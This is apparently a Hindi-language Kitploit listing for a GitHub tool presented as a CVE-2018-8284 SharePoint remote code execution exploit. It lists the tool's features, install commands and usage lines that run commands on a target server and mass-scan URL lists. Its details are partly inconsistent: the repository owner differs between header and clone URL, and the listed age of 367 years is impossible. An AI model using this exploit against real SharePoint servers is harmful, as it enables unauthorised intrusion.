Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-8284-Sharepoint-RCE | Kitploit
उपकरण/GitHubGitHub/quantiti/cve-2018-8284-sharepoint-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubquantiti/cve-2018-8284-sharepoint-rce

CVE-2018-8284-Sharepoint-RCE

रिपॉजिटरी देखें
367 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-8284-Sharepoint-RCE

CVE-2018-8284 SharePoint RCE एक ऐसा एक्सप्लॉइट है जो Microsoft SharePoint में पाए गए एक कमज़ोरी का फायदा उठाता है। यह कमज़ोरी SharePoint में XML deserialization के कारण उत्पन्न होती है, जो एक remote attacker को विशेष रूप से निर्मित अनुरोध भेजकर मनमाना कोड निष्पादित करने की अनुमति देती है।

सुविधाएँ

  • SharePoint Server 2010, 2013, और 2016 के खिलाफ RCE एक्सप्लॉइट
  • कमज़ोर SharePoint सर्वर की पहचान करने के लिए स्कैनर मोड
  • एक्सप्लॉइटेशन के लिए interactive shell
  • XML payload जनरेशन
  • कई targets के लिए मल्टी-थ्रेडेड सपोर्ट
  • HTTP और HTTPS दोनों के लिए सपोर्ट

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/GlennPegden2/cve-2018-8284-Sharepoint-RCE.git
cd cve-2018-8284-Sharepoint-RCE
pip install -r requirements.txt

उपयोग

root@kitploit:~
python3 CVE-2018-8284.py --help
root@kitploit:~
usage: CVE-2018-8284.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-s SCAN] [-t THREADS]

CVE-2018-8284 SharePoint RCE एक्सप्लॉइट

options:
  -h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
  -u URL, --url URL     लक्ष्य SharePoint URL (उदाहरण: http://target.com)
  -c COMMAND, --command COMMAND
                        निष्पादित करने के लिए कमांड
  -p PROXY, --proxy PROXY
                        प्रॉक्सी URL (वैकल्पिक)
  -s SCAN, --scan SCAN  scan करने के लिए URL फ़ाइल
  -t THREADS, --threads THREADS
                        थ्रेड की संख्या (डिफ़ॉल्ट: 10)

उदाहरण

एक एकल लक्ष्य के खिलाफ एक्सप्लॉइट:

root@kitploit:~
python3 CVE-2018-8284.py -u http://target.com -c "whoami"

प्रॉक्सी के साथ एक्सप्लॉइट:

root@kitploit:~
python3 CVE-2018-8284.py -u http://target.com -c "whoami" -p http://127.0.0.1:8080

URLs की सूची स्कैन करना:

root@kitploit:~
python3 CVE-2018-8284.py -s urls.txt -t 50

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। किसी भी अनधिकृत उपयोग के लिए लेखक ज़िम्मेदार नहीं है। केवल उन प्रणालियों के खिलाफ उपयोग करें जिनके आप स्वामी हैं या जिन्हें परीक्षण करने की स्पष्ट अनुमति है।

टूल डाउनलोड करें